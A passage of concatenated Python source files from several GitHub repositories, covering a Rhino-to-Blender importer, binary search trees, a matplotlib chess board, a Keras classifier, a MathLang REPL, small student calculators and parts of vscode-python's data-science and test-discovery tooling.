og = ob.Geometry
# Skip unsupported object types early
if og.ObjectType not in converters.RHINO_TYPE_TO_IMPORT and og.ObjectType != r3d.ObjectType.InstanceReference:
print("Unsupported object type: {}".format(og.ObjectType))
continue
#convert_rhino_object = converters.RHINO_TYPE_TO_IMPORT[og.ObjectType]
# Check object and layer visibility
attr = ob.Attributes
if not attr.Visible and not import_hidden_objects:
continue
rhinolayer = model.Layers.FindIndex(attr.LayerIndex)
if not rhinolayer.Visible and not import_hidden_layers:
continue
# Create object name
if attr.Name == "" or attr.Name is None:
n = str(og.ObjectType).split(".")[1]+" " + str(attr.Id)
else:
n = attr.Name
# Get render material
mat_index = ob.Attributes.MaterialIndex
if ob.Attributes.MaterialSource == r3d.ObjectMaterialSource.MaterialFromLayer:
mat_index = rhinolayer.RenderMaterialIndex
rhino_material = model.Materials.FindIndex(mat_index)
# Handle default material and fetch associated Blender material
if rhino_material.Name == "":
matname = converters.material.DEFAULT_RHINO_MATERIAL
else:
matname = converters.material_name(rhino_material)
# Handle object view color
if ob.Attributes.ColorSource == r3d.ObjectColorSource.ColorFromLayer:
view_color = rhinolayer.Color
else:
view_color = ob.Attributes.ObjectColor
rhinomat = materials[matname]
# Fetch layer
layer = layerids[str(rhinolayer.Id)][1]
if og.ObjectType==r3d.ObjectType.InstanceReference and import_instances:
n = model.InstanceDefinitions.FindId(og.ParentIdefId).Name
# Convert object
converters.convert_object(context, ob, n, layer, rhinomat, view_color, scale, options)
#convert_rhino_object(og, context, n, attr.Name, attr.Id, layer, rhinomat, scale)
if import_groups:
converters.handle_groups(context,attr,toplayer,import_nested_groups)
if import_instances:
converters.populate_instance_definitions(context, model, toplayer, "Instance Definitions", options, scale)
# finally link in the container collection (top layer) into the main
# scene collection.
try:
context.blend_data.scenes[0].collection.children.link(toplayer)
bpy.ops.object.shade_smooth({'selected_editable_objects': toplayer.all_objects})
except Exception:
pass
return {'FINISHED'}
```
|
{
"source": "jesterKing/rhipy",
"score": 2
}
|
#### File: jesterKing/rhipy/change_texture_filepath.py
```python
import os
import rhinoscriptsyntax
import scriptcontext
import Rhino.Render
import System.Convert
def handle_render_content(render_content, target):
child = render_content.FirstChild
while child:
handle_render_content(child, target)
if child.IsImageBased():
child.BeginChange(Rhino.Render.RenderContent.ChangeContexts.Program)
source_path = System.Convert.ToString(child.GetParameter("filename"))
source_file = os.path.basename(source_path)
child.SetParameter("filename", target + os.sep + source_file)
child.EndChange()
child = child.NextSibling
target = rhinoscriptsyntax.BrowseForFolder()
for render_material in scriptcontext.doc.RenderMaterials:
handle_render_content(render_material, target)
```
|
{
"source": "JesterOrNot/Algorithms",
"score": 4
}
|
#### File: Algorithms/BST/BST.py
```python
class Node:
def __init__(self, value):
self.left = None
self.right = None
self.value = value
class BinaryTree(object):
def __init__(self):
super(BinaryTree,self).__init__()
self.root = None
def printInOrder(root):
if not root:
return
printInOrder(root.left)
print(root.value,end=", ")
printInOrder(root.right)
def printPreOrder(root):
if not root:
return
print(root.value,end=", ")
printPreOrder(root.left)
printPreOrder(root.right)
def printPostOrder(root):
if not root:
return
printPostOrder(root.left)
printPostOrder(root.right)
print(root.value,end=", ")
def findNode(target,tree,current):
if target == current.value:
return True
elif target < current.value:
if current.left is not None:
current = current.left
else:
return False
elif target >= current.value:
if current.right is not None:
current = current.right
else:
return False
return findNode(target,tree,current)
def insertNode(node,root):
if root == None:
return node
elif node.value < root.value:
root.left = insertNode(node,root.left)
else:
root.right = insertNode(node,root.right)
return root
def assembleTree(theList):
tree = BinaryTree()
tree.root = Node(theList[0])
index = 1
while index <= len(theList)-1:
insertNode(Node(theList[index]),tree.root)
index+=1
return(tree)
tree = assembleTree([5,2,1,0,3.10,3.5,-3])
printInOrder(tree.root)
print()
```
|
{
"source": "JesterOrNot/Chess",
"score": 3
}
|
#### File: Chess/src/chessBoard.py
```python
import matplotlib.pyplot as plt
import matplotlib.image as mpimg
from matplotlib.offsetbox import OffsetImage, AnnotationBbox
import __init__ # imports all the piece classes
pieces = __init__.Pieces() # declares the class pieces locally as 'pieces'
# This function plots the image data for the sprites
def board():
def getImage(path):
return OffsetImage(plt.imread(path))
# This gets sprites images and puts it in a list
paths = [pieces.WhitePawn1.paths, pieces.WhitePawn2.paths, pieces.WhitePawn3.paths, pieces.WhitePawn4.paths, pieces.WhitePawn5.paths, pieces.WhitePawn6.paths,
pieces.WhitePawn7.paths, pieces.WhitePawn1.paths, pieces.WhiteBishop1.paths, pieces.WhiteBishop2.paths, pieces.BlackBishop1.paths, pieces.BlackBishop2.paths,
pieces.WhiteRook1.paths,
pieces.WhiteRook2.paths,
pieces.WhiteKnight1.paths,
pieces.WhiteKnight2.paths,
pieces.WhiteQueen.paths,
pieces.WhiteKing.paths,
pieces.BlackPawn1.paths,
pieces.BlackPawn2.paths,
pieces.BlackPawn3.paths,
pieces.BlackPawn4.paths,
pieces.BlackPawn5.paths,
pieces.BlackPawn6.paths,
pieces.BlackPawn7.paths,
pieces.BlackPawn8.paths,
pieces.BlackRook1.paths,
pieces.BlackRook2.paths,
pieces.BlackKnight1.paths,
pieces.BlackKnight2.paths,
pieces.BlackQueen.paths,
pieces.BlackKing.paths]
# This gets each sprites x position
x = [pieces.WhitePawn1.Position.get("x"), pieces.WhitePawn2.Position.get("x"), pieces.WhitePawn3.Position.get("x"), pieces.WhitePawn4.Position.get("x"), pieces.WhitePawn5.Position.get("x"), pieces.WhitePawn6.Position.get(
"x"), pieces.WhitePawn7.Position.get("x"), pieces.WhitePawn8.Position.get("x"), pieces.WhiteBishop1.Position.get("x"), pieces.WhiteBishop2.Position.get("x"), pieces.BlackBishop1.Position.get("x"), pieces.BlackBishop2.Position.get("x"),
pieces.WhiteRook1.Position.get("x"),
pieces.WhiteRook2.Position.get("x"),
pieces.WhiteKnight1.Position.get("x"),
pieces.WhiteKnight2.Position.get("x"),
pieces.WhiteQueen.Position.get("x"),
pieces.WhiteKing.Position.get("x"),
pieces.BlackPawn1.Position.get("x"),
pieces.BlackPawn2.Position.get("x"),
pieces.BlackPawn3.Position.get("x"),
pieces.BlackPawn4.Position.get("x"),
pieces.BlackPawn5.Position.get("x"),
pieces.BlackPawn6.Position.get("x"),
pieces.BlackPawn7.Position.get("x"),
pieces.BlackPawn8.Position.get("x"),
pieces.BlackRook1.Position.get("x"),
pieces.BlackRook2.Position.get("x"),
pieces.BlackKnight1.Position.get("x"),
pieces.BlackKnight2.Position.get("x"),
pieces.BlackQueen.Position.get("x"),
pieces.BlackKing.Position.get("x")]
# This gets the pieces y position
y = [pieces.WhitePawn1.Position.get("y"), pieces.WhitePawn2.Position.get(
"y"), pieces.WhitePawn3.Position.get("y"), pieces.WhitePawn4.Position.get("y"), pieces.WhitePawn5.Position.get("y"), pieces.WhitePawn6.Position.get("y"), pieces.WhitePawn7.Position.get("y"), pieces.WhitePawn8.Position.get("y"), pieces.WhiteBishop1.Position.get("y"), pieces.WhiteBishop2.Position.get("y"), pieces.BlackBishop1.Position.get("y"), pieces.BlackBishop2.Position.get("y"),
pieces.WhiteRook1.Position.get("y"),
pieces.WhiteRook2.Position.get("y"),
pieces.WhiteKnight1.Position.get("y"),
pieces.WhiteKnight2.Position.get("y"),
pieces.WhiteQueen.Position.get('y'),
pieces.WhiteKing.Position.get("y"),
pieces.BlackPawn1.Position.get("y"),
pieces.BlackPawn2.Position.get("y"),
pieces.BlackPawn3.Position.get("y"),
pieces.BlackPawn4.Position.get("y"),
pieces.BlackPawn5.Position.get("y"),
pieces.BlackPawn6.Position.get("y"),
pieces.BlackPawn7.Position.get("y"),
pieces.BlackPawn8.Position.get("y"),
pieces.BlackRook1.Position.get("y"),
pieces.BlackRook2.Position.get("y"),
pieces.BlackKnight1.Position.get("y"),
pieces.BlackKnight2.Position.get("y"),
pieces.BlackQueen.Position.get("y"),
pieces.BlackKing.Position.get("y")]
fig, ax = plt.subplots() # declares that the graph will be shown as a subplot (for asthetics and to declare a variable for the subplot)
# This declares that the plot is a scatter_plot
ax.scatter(x, y)
### for development we show these tick marks to help visualize each square on the board
plt.xticks([100,240,380,520,650,780,910,1040,1180])
plt.yticks([100,240,370,500,630,760,890,1020,1150])
plt.xticks([]) ## Uncomment this when in deployment
plt.yticks([]) ## Uncomment this when in deployment
# plt.grid(which='both',axis='both') # Comment this in deployment it shows the grid on the plot
img = mpimg.imread('Sprites/chessBoard.png') ## Creates the background image in this case the chess board
imgplot = plt.imshow(img) ## shows the board
for x0, y0, path in zip(x, y, paths): ## Loops through the lists and uses zip to make a set for each piece containing the path to the image and it's respective x & y coordinate
ab = AnnotationBbox(getImage(path), (x0, y0), frameon=False) ## reads the sprites
ax.add_artist(ab) ### Shows the sprites
plt.savefig("theBoard/chessBoard.png") ### Displays the subplot
board()
```
|
{
"source": "JesterOrNot/ClothingID",
"score": 3
}
|
#### File: JesterOrNot/ClothingID/model.py
```python
import tensorflow as tf
def ClothingID(training_images, training_labels, test_images, test_labels):
"""Machine learning function."""
model = tf.keras.models.Sequential([
tf.keras.layers.Conv2D(64, (3, 3), activation='relu', input_shape=(28, 28, 1)),
tf.keras.layers.MaxPooling2D(2, 2),
tf.keras.layers.Conv2D(64, (3, 3), activation='relu'),
tf.keras.layers.MaxPooling2D(2, 2),
tf.keras.layers.Flatten(),
tf.keras.layers.Dense(128, activation=tf.nn.relu),
tf.keras.layers.Dense(10, activation=tf.nn.softmax)
])
model.compile(optimizer='adam', loss='sparse_categorical_crossentropy', metrics=['accuracy'])
model.fit(training_images, training_labels, epochs=5)
predictions = model.predict(test_images)
model.save('path_to_saved_model', save_format='tf')
return predictions
```
|
{
"source": "JesterOrNot/MathLang",
"score": 3
}
|
#### File: MathLang/repl/repl.py
```python
import sys
import tty
import re
import os
def syntax_highlight(input, keywords: dict):
i = 0
splitted = input.split(" ")
for f in splitted:
for keyword in keywords.keys():
if re.match(keyword, f):
splitted[i] = keywords.get(
keyword) + re.findall(keyword, f)[0] + u"\u001b[0m"
i += 1
return " ".join(splitted)
def command_line(keywords: dict):
tty.setraw(sys.stdin)
input = ""
index = 0
sys.stdout.write("\n")
sys.stdout.write(u"\u001b[1000D")
sys.stdout.write(u"\u001b[0K")
do_print = True
while True:
if do_print:
sys.stdout.write(">>> ")
do_print = False
sys.stdout.flush()
char = sys.stdin.read(1)
if char == ":":
sys.stdout.write("\n")
sys.stdout.write(u"\u001b[1000D")
sys.stdout.write(u"\u001b[0K")
return ""
if 32 <= ord(char) <= 126:
input += char
if ord(char) == 127:
input = input[:index-1]
if ord(char) in {10, 13}:
sys.stdout.write("\n")
sys.stdout.write(u"\u001b[1000D")
sys.stdout.write(u"\u001b[0K")
sys.stdout.flush()
with open("/tmp/.mlangrepl.temp", "w+") as f:
f.write(input)
os.system("mathlang /tmp/.mlangrepl.temp")
input = ""
sys.stdout.write("\n")
sys.stdout.write(u"\u001b[1000D")
sys.stdout.write(u"\u001b[0K")
sys.stdout.flush()
do_print = True
continue
sys.stdout.write(u"\u001b[1000D")
sys.stdout.write(u"\u001b[4C")
sys.stdout.write(u"\u001b[0K")
sys.stdout.write(syntax_highlight(input, keywords))
if index > 0:
sys.stdout.write(u"\u001b[" + str(index) + "C")
sys.stdout.flush()
return input
command_line({"sqrt": "\u001b[38;5;198m",
"log": "\u001b[38;5;198m",
"say": "\u001b[38;5;198m",
"sin": "\u001b[38;5;198m",
"cos": "\u001b[38;5;198m",
"tan": "\u001b[38;5;198m",
"cbrt": "\u001b[38;5;198m",
"asin": "\u001b[38;5;198m",
"acos": "\u001b[38;5;198m",
"atan": "\u001b[38;5;198m",
"\d+": "\u001b[38;2;214;119;119m",
"\+": "\u001b[38;2;112;112;112m",
"-": "\u001b[38;2;112;112;112m",
"\*\*?": "\u001b[38;2;112;112;112m",
"/": "\u001b[38;2;112;112;112m",
"%": "\u001b[38;2;112;112;112m",
"\".*\"": "\u001b[38;2;26;166;228m",
})
```
|
{
"source": "JesterOrNot/python_calc",
"score": 4
}
|
#### File: algeb/graph/main.py
```python
print('Welcome to the graphing calculator the only option so far is graphing quadratic models(qe), exponential functions(ef)')
userInt = input("What do you want to graph?: ")
def choose():
if userInt in 'qe':
import algeb.graph.graphQuadMod
elif userInt in 'ef':
import algeb.graph.graphExpFunc
else:
print("Error, Please try again this error may be due to mispelling on your part")
choose()
choose()
```
#### File: python_calc/algeb/linEquSolv.py
```python
def les():
def slope():
y1 = float(input('What is y1?: '))
y2 = float(input('What is y2?: '))
x1 = float(input('What is x1?: '))
x2 = float(input('What is x2?: '))
slope = (y2 - y1)/(x2 - x1)
b = ((slope * x1)*-1) + y1
print('y = {}x + {}'.format(slope, b))
slope()
try:
les()
except ZeroDivisionError:
print("You can't divide by zero silly!")
#The method I used for finding the equ for b was via reorganizing
# y = mx + b
# -b -b
# y - b = mx
# -y -y
# -b = mx - y
# (-b)*-1 = (mx -y)*-1
# b = -mx + y
```
#### File: python_calc/algeb/median.py
```python
def median3():
numbers1 = input("What numbers are we finding the median of?: ")
numbers1 = numbers1.split(",")
num = []
for i in numbers1:
i = float(i)
n = num.append(i)
n1 = num.sort()
z = len(num)
if z % 2 == 0:
median1 = num[z//2]
median2 = num[z//2-1]
median = (median1 + median2)/2
else:
median = num[z//2]
median = float(median)
print(f"The Median is: {median}")
median3()
```
#### File: python_calc/algeb/quad.py
```python
from math import sqrt
def quad():
a = float(input('What is a?: '))
b = float(input('What is b?: '))
c = float(input('What is c?: '))
xplus = ( (b * -1) + (sqrt( (b ** 2) - (4* a * c) )) ) / (2 * a)
xminus = ( (b * -1) - (sqrt( (b ** 2) - (4* a * c) )) ) / (2 * a)
print('x = {} or x = {}'.format(xplus, xminus))
try:
quad()
except ValueError():
print('Error: Tip, you cant take the square root of a negative number see if that is the issue!')
```
#### File: geom/area/AOCircle.py
```python
from math import pi
def aoc():
r = float(input("What is the radius?: "))
a = pi * (r ** 2)
print("A = {}".format(a))
```
#### File: python_calc/geom/main.py
```python
import os
print("Welcome to the geometry calculator avaliable calculators include: area finder (af), pythagTheo(pt), sin cos tan finder(sct), trigonometric table(tt)")
while True:
def chooseCalc():
userInt = input("What do you want to use?: ").lower()
if userInt == "af":
os.chdir('Area')
os.system('python3 ./main.py')
elif userInt == 'pt':
import thagTheo
elif userInt == 'sct':
import geom.SinCosTan
elif userInt == 'tt':
import geom.trigTabl
elif userInt == 'exit':
exit()
chooseCalc()
chooseCalc()
```
#### File: python_calc/geom/SinCosTan.py
```python
def sin():
o = float(input('What is the oppisite?: '))
h = float(input("What is the hypotnuse?: "))
s = o / h
print("sin = {}".format(s))
def cos():
a = float(input('What is the ajacent?: '))
h = float(input("What is the hypotnuse?: "))
c = a / h
print('cos = {}'.format(c))
def tan():
o = float(input("What is the oppisite?: "))
a = float(input("What is the ajacent?: "))
t = o / a
print("tan = {}".format(t))
def main():
userInt = input('What are we solving for (sin cos or tan)?: ').lower()
if userInt == 'sin':
sin()
elif userInt == 'cos':
cos()
elif userInt == 'tan':
tan()
else:
print('An error has occured please try again')
main()
```
#### File: python_calc/phys/accelerate.py
```python
def acceleration():
initial_velocity = float(input("What is the initial velocity?: "))
final_velocity = float(input("What is the final velocity?: "))
starting_time = float(input("What is the starting time?: "))
ending_time = float(input("What is the ending time?: "))
delta_t = ending_time - starting_time
delta_v = final_velocity - initial_velocity
acceleration = delta_v/delta_t
print(f"acceleration = {acceleration} m/s")
acceleration()
```
#### File: python_calc/phys/distspeed.py
```python
while True:
def DSTFC():
keywordsDist = ['d', 'dis', 'dist', 'distance']
keywordsTime = ['t', 'tim', 'time', 'ti']
keywordsSpeed = ['s', 'sp', 'spe', 'spee', 'speed']
print("Welcome to the distance speed time calculator")
solveFor = input("What are we solvig for? (distance(d), speed(s) or time(t): ").lower()
if solveFor in keywordsDist:
s = float(input("What is speed in meters/seconds?: "))
t = float(input("What is the amount of time in seconds?: "))
dist = s * t
print("{} meters".format(dist))
elif solveFor in keywordsTime:
d = float(input("What is the distance in meters?: "))
s = float(input("What is the speed in meters/seconds"))
time = d / s
print("{} seconds".format(time))
elif solveFor in keywordsSpeed:
d = float(input("What is the distance in meters?: "))
t = float(input("What is the time in seconds"))
speed = d / t
print("{} m/s".format(speed))
DSTFC()
DSTFC()
```
|
{
"source": "JesterOrNot/vscode-python",
"score": 3
}
|
#### File: datascience/daemon/daemon_output.py
```python
import os
import sys
import logging
from threading import Lock
log = logging.getLogger(__name__)
class IORedirector:
"""
This class works to wrap a stream (stdout/stderr) with an additional redirect.
"""
def __init__(self, name, original, new_redirect, wrap_buffer=False):
"""
:param stream original:
The stream to be wrapped (usually stdout/stderr, but could be None).
:param stream new_redirect:
:param bool wrap_buffer:
Whether to create a buffer attribute (needed to mimick python 3 s
tdout/stderr which has a buffer to write binary data).
"""
self._name = name
self._lock = Lock()
self._writing = False
self._redirect_to = (new_redirect,)
if wrap_buffer and hasattr(original, "buffer"):
self.buffer = IORedirector(
name, original.buffer, new_redirect.buffer, False
)
def write(self, s):
# Note that writing to the original stream may fail for some reasons
# (such as trying to write something that's not a string or having it closed).
with self._lock:
if self._writing:
return
self._writing = True
try:
for r in self._redirect_to:
if hasattr(r, "write"):
r.write(s)
finally:
self._writing = False
def isatty(self):
for r in self._redirect_to:
if hasattr(r, "isatty"):
return r.isatty()
return False
def flush(self):
for r in self._redirect_to:
if hasattr(r, "flush"):
r.flush()
def __getattr__(self, name):
log.info("getting attr for %s: %s", self._name, name)
for r in self._redirect_to:
if hasattr(r, name):
return getattr(r, name)
raise AttributeError(name)
class CustomWriter(object):
def __init__(self, name, wrap_stream, wrap_buffer, on_write=None):
"""
:param wrap_stream:
Either sys.stdout or sys.stderr.
:param bool wrap_buffer:
If True the buffer attribute (which wraps writing bytes) should be
wrapped.
:param callable(str) on_write:
Call back with the string that has been written.
"""
self._name = name
encoding = getattr(wrap_stream, "encoding", None)
if not encoding:
encoding = os.environ.get("PYTHONIOENCODING", "utf-8")
self.encoding = encoding
if wrap_buffer:
self.buffer = CustomWriter(
name, wrap_stream, wrap_buffer=False, on_write=on_write
)
self._on_write = on_write
def flush(self):
pass # no-op here
def write(self, s):
if s:
# Need s in str
if isinstance(s, bytes):
s = s.decode(self.encoding, errors="replace")
log.info("write to %s: %s", self._name, s)
if self._on_write is not None:
self._on_write(s)
_stdin = sys.stdin.buffer
_stdout = sys.stdout.buffer
def get_io_buffers():
return _stdin, _stdout
def redirect_output(stdout_handler, stderr_handler):
log.info("Redirect stdout/stderr")
sys._vsc_out_buffer_ = CustomWriter("stdout", sys.stdout, True, stdout_handler)
sys.stdout_original = sys.stdout
_stdout_redirector = sys.stdout = IORedirector(
"stdout", sys.stdout, sys._vsc_out_buffer_, True
)
sys._vsc_err_buffer_ = CustomWriter("stderr", sys.stderr, True, stderr_handler)
sys.stderr_original = sys.stderr
_stderr_redirector = sys.stderr = IORedirector(
"stderr", sys.stderr, sys._vsc_err_buffer_, True
)
```
#### File: vscode-python/pythonFiles/symbolProvider.py
```python
import ast
import json
import sys
class Visitor(ast.NodeVisitor):
def __init__(self):
self.symbols = {"classes": [], "methods": [], "functions": []}
def visit_Module(self, node):
self.visitChildren(node)
def visitChildren(self, node, namespace=""):
for child in node.body:
if isinstance(child, ast.FunctionDef):
self.visitDef(child, namespace)
if isinstance(child, ast.ClassDef):
self.visitClassDef(child, namespace)
try:
if isinstance(child, ast.AsyncFunctionDef):
self.visitDef(child, namespace)
except Exception:
pass
def visitDef(self, node, namespace=""):
end_position = self.getEndPosition(node)
symbol = "functions" if namespace == "" else "methods"
self.symbols[symbol].append(self.getDataObject(node, namespace))
def visitClassDef(self, node, namespace=""):
end_position = self.getEndPosition(node)
self.symbols['classes'].append(self.getDataObject(node, namespace))
if len(namespace) > 0:
namespace = "{0}::{1}".format(namespace, node.name)
else:
namespace = node.name
self.visitChildren(node, namespace)
def getDataObject(self, node, namespace=""):
end_position = self.getEndPosition(node)
return {
"namespace": namespace,
"name": node.name,
"range": {
"start": {
"line": node.lineno - 1,
"character": node.col_offset
},
"end": {
"line": end_position[0],
"character": end_position[1]
}
}
}
def getEndPosition(self, node):
if not hasattr(node, 'body') or len(node.body) == 0:
return (node.lineno - 1, node.col_offset)
return self.getEndPosition(node.body[-1])
def provide_symbols(source):
"""Provides a list of all symbols in provided code.
The list comprises of 3-item tuples that contain the starting line number,
ending line number and whether the statement is a single line.
"""
tree = ast.parse(source)
visitor = Visitor()
visitor.visit(tree)
sys.stdout.write(json.dumps(visitor.symbols))
sys.stdout.flush()
if __name__ == "__main__":
if len(sys.argv) == 3:
contents = sys.argv[2]
else:
with open(sys.argv[1], "r") as source:
contents = source.read()
try:
default_encoding = sys.getdefaultencoding()
encoded_contents = contents.encode(default_encoding, 'surrogateescape')
contents = encoded_contents.decode(default_encoding, 'replace')
except (UnicodeError, LookupError):
pass
if isinstance(contents, bytes):
contents = contents.decode('utf8')
provide_symbols(contents)
```
#### File: testing_tools/adapter/errors.py
```python
class UnsupportedToolError(ValueError):
def __init__(self, tool):
msg = 'unsupported tool {!r}'.format(tool)
super(UnsupportedToolError, self).__init__(msg)
self.tool = tool
class UnsupportedCommandError(ValueError):
def __init__(self, cmd):
msg = 'unsupported cmd {!r}'.format(cmd)
super(UnsupportedCommandError, self).__init__(msg)
self.cmd = cmd
```
#### File: adapter/pytest/_cli.py
```python
from __future__ import absolute_import
from ..errors import UnsupportedCommandError
def add_subparser(cmd, name, parent):
"""Add a new subparser to the given parent and add args to it."""
parser = parent.add_parser(name)
if cmd == 'discover':
# For now we don't have any tool-specific CLI options to add.
pass
else:
raise UnsupportedCommandError(cmd)
return parser
```
#### File: testing_tools/adapter/test_discovery.py
```python
from __future__ import absolute_import, print_function
import unittest
from testing_tools.adapter.util import fix_path, fix_relpath
from testing_tools.adapter.info import TestInfo, TestPath, ParentInfo
from testing_tools.adapter.discovery import fix_nodeid, DiscoveredTests
def _fix_nodeid(nodeid):
nodeid = nodeid.replace('\\', '/')
if not nodeid.startswith('./'):
nodeid = './' + nodeid
return nodeid
class DiscoveredTestsTests(unittest.TestCase):
def test_list(self):
testroot = fix_path('/a/b/c')
relfile = fix_path('./test_spam.py')
tests = [
TestInfo(
# missing "./":
id='test_spam.py::test_each[10-10]',
name='test_each[10-10]',
path=TestPath(
root=testroot,
relfile=relfile,
func='test_each',
sub=['[10-10]'],
),
source='{}:{}'.format(relfile, 10),
markers=None,
# missing "./":
parentid='test_spam.py::test_each',
),
TestInfo(
id='test_spam.py::All::BasicTests::test_first',
name='test_first',
path=TestPath(
root=testroot,
relfile=relfile,
func='All.BasicTests.test_first',
sub=None,
),
source='{}:{}'.format(relfile, 62),
markers=None,
parentid='test_spam.py::All::BasicTests',
),
]
allparents= [
[(fix_path('./test_spam.py::test_each'), 'test_each', 'function'),
(fix_path('./test_spam.py'), 'test_spam.py', 'file'),
('.', testroot, 'folder'),
],
[(fix_path('./test_spam.py::All::BasicTests'), 'BasicTests', 'suite'),
(fix_path('./test_spam.py::All'), 'All', 'suite'),
(fix_path('./test_spam.py'), 'test_spam.py', 'file'),
('.', testroot, 'folder'),
],
]
expected = [test._replace(id=_fix_nodeid(test.id),
parentid=_fix_nodeid(test.parentid))
for test in tests]
discovered = DiscoveredTests()
for test, parents in zip(tests, allparents):
discovered.add_test(test, parents)
size = len(discovered)
items = [discovered[0], discovered[1]]
snapshot = list(discovered)
self.maxDiff = None
self.assertEqual(size, 2)
self.assertEqual(items, expected)
self.assertEqual(snapshot, expected)
def test_reset(self):
testroot = fix_path('/a/b/c')
discovered = DiscoveredTests()
discovered.add_test(
TestInfo(
id='./test_spam.py::test_each',
name='test_each',
path=TestPath(
root=testroot,
relfile='test_spam.py',
func='test_each',
),
source='test_spam.py:11',
markers=[],
parentid='./test_spam.py',
),
[('./test_spam.py', 'test_spam.py', 'file'),
('.', testroot, 'folder'),
])
before = len(discovered), len(discovered.parents)
discovered.reset()
after = len(discovered), len(discovered.parents)
self.assertEqual(before, (1, 2))
self.assertEqual(after, (0, 0))
def test_parents(self):
testroot = fix_path('/a/b/c')
relfile = fix_path('x/y/z/test_spam.py')
tests = [
TestInfo(
# missing "./", using pathsep:
id=relfile + '::test_each[10-10]',
name='test_each[10-10]',
path=TestPath(
root=testroot,
relfile=fix_relpath(relfile),
func='test_each',
sub=['[10-10]'],
),
source='{}:{}'.format(relfile, 10),
markers=None,
# missing "./", using pathsep:
parentid=relfile + '::test_each',
),
TestInfo(
# missing "./", using pathsep:
id=relfile + '::All::BasicTests::test_first',
name='test_first',
path=TestPath(
root=testroot,
relfile=fix_relpath(relfile),
func='All.BasicTests.test_first',
sub=None,
),
source='{}:{}'.format(relfile, 61),
markers=None,
# missing "./", using pathsep:
parentid=relfile + '::All::BasicTests',
),
]
allparents= [
# missing "./", using pathsep:
[(relfile + '::test_each', 'test_each', 'function'),
(relfile, relfile, 'file'),
('.', testroot, 'folder'),
],
# missing "./", using pathsep:
[(relfile + '::All::BasicTests', 'BasicTests', 'suite'),
(relfile + '::All', 'All', 'suite'),
(relfile, 'test_spam.py', 'file'),
(fix_path('x/y/z'), 'z', 'folder'),
(fix_path('x/y'), 'y', 'folder'),
(fix_path('./x'), 'x', 'folder'),
('.', testroot, 'folder'),
],
]
discovered = DiscoveredTests()
for test, parents in zip(tests, allparents):
discovered.add_test(test, parents)
parents = discovered.parents
self.maxDiff = None
self.assertEqual(parents, [
ParentInfo(
id='.',
kind='folder',
name=testroot,
),
ParentInfo(
id='./x',
kind='folder',
name='x',
root=testroot,
relpath=fix_path('./x'),
parentid='.',
),
ParentInfo(
id='./x/y',
kind='folder',
name='y',
root=testroot,
relpath=fix_path('./x/y'),
parentid='./x',
),
ParentInfo(
id='./x/y/z',
kind='folder',
name='z',
root=testroot,
relpath=fix_path('./x/y/z'),
parentid='./x/y',
),
ParentInfo(
id='./x/y/z/test_spam.py',
kind='file',
name='test_spam.py',
root=testroot,
relpath=fix_relpath(relfile),
parentid='./x/y/z',
),
ParentInfo(
id='./x/y/z/test_spam.py::All',
kind='suite',
name='All',
root=testroot,
parentid='./x/y/z/test_spam.py',
),
ParentInfo(
id='./x/y/z/test_spam.py::All::BasicTests',
kind='suite',
name='BasicTests',
root=testroot,
parentid='./x/y/z/test_spam.py::All',
),
ParentInfo(
id='./x/y/z/test_spam.py::test_each',
kind='function',
name='test_each',
root=testroot,
parentid='./x/y/z/test_spam.py',
),
])
def test_add_test_simple(self):
testroot = fix_path('/a/b/c')
relfile = 'test_spam.py'
test = TestInfo(
# missing "./":
id=relfile + '::test_spam',
name='test_spam',
path=TestPath(
root=testroot,
# missing "./":
relfile=relfile,
func='test_spam',
),
# missing "./":
source='{}:{}'.format(relfile, 11),
markers=[],
# missing "./":
parentid=relfile,
)
expected = test._replace(id=_fix_nodeid(test.id),
parentid=_fix_nodeid(test.parentid))
discovered = DiscoveredTests()
before = list(discovered), discovered.parents
discovered.add_test(test, [
(relfile, relfile, 'file'),
('.', testroot, 'folder'),
])
after = list(discovered), discovered.parents
self.maxDiff = None
self.assertEqual(before, ([], []))
self.assertEqual(after, ([expected], [
ParentInfo(
id='.',
kind='folder',
name=testroot,
),
ParentInfo(
id='./test_spam.py',
kind='file',
name=relfile,
root=testroot,
relpath=relfile,
parentid='.',
),
]))
def test_multiroot(self):
# the first root
testroot1 = fix_path('/a/b/c')
relfile1 = 'test_spam.py'
alltests = [
TestInfo(
# missing "./":
id=relfile1 + '::test_spam',
name='test_spam',
path=TestPath(
root=testroot1,
relfile=fix_relpath(relfile1),
func='test_spam',
),
source='{}:{}'.format(relfile1, 10),
markers=[],
# missing "./":
parentid=relfile1,
),
]
allparents = [
# missing "./":
[(relfile1, 'test_spam.py', 'file'),
('.', testroot1, 'folder'),
],
]
# the second root
testroot2 = fix_path('/x/y/z')
relfile2 = fix_path('w/test_eggs.py')
alltests.extend([
TestInfo(
id=relfile2 + '::BasicTests::test_first',
name='test_first',
path=TestPath(
root=testroot2,
relfile=fix_relpath(relfile2),
func='BasicTests.test_first',
),
source='{}:{}'.format(relfile2, 61),
markers=[],
parentid=relfile2 + '::BasicTests',
),
])
allparents.extend([
# missing "./", using pathsep:
[(relfile2 + '::BasicTests', 'BasicTests', 'suite'),
(relfile2, 'test_eggs.py', 'file'),
(fix_path('./w'), 'w', 'folder'),
('.', testroot2, 'folder'),
],
])
discovered = DiscoveredTests()
for test, parents in zip(alltests, allparents):
discovered.add_test(test, parents)
tests = list(discovered)
parents = discovered.parents
self.maxDiff = None
self.assertEqual(tests, [
# the first root
TestInfo(
id='./test_spam.py::test_spam',
name='test_spam',
path=TestPath(
root=testroot1,
relfile=fix_relpath(relfile1),
func='test_spam',
),
source='{}:{}'.format(relfile1, 10),
markers=[],
parentid='./test_spam.py',
),
# the secondroot
TestInfo(
id='./w/test_eggs.py::BasicTests::test_first',
name='test_first',
path=TestPath(
root=testroot2,
relfile=fix_relpath(relfile2),
func='BasicTests.test_first',
),
source='{}:{}'.format(relfile2, 61),
markers=[],
parentid='./w/test_eggs.py::BasicTests',
),
])
self.assertEqual(parents, [
# the first root
ParentInfo(
id='.',
kind='folder',
name=testroot1,
),
ParentInfo(
id='./test_spam.py',
kind='file',
name='test_spam.py',
root=testroot1,
relpath=fix_relpath(relfile1),
parentid='.',
),
# the secondroot
ParentInfo(
id='.',
kind='folder',
name=testroot2,
),
ParentInfo(
id='./w',
kind='folder',
name='w',
root=testroot2,
relpath=fix_path('./w'),
parentid='.',
),
ParentInfo(
id='./w/test_eggs.py',
kind='file',
name='test_eggs.py',
root=testroot2,
relpath=fix_relpath(relfile2),
parentid='./w',
),
ParentInfo(
id='./w/test_eggs.py::BasicTests',
kind='suite',
name='BasicTests',
root=testroot2,
parentid='./w/test_eggs.py',
),
])
def test_doctest(self):
testroot = fix_path('/a/b/c')
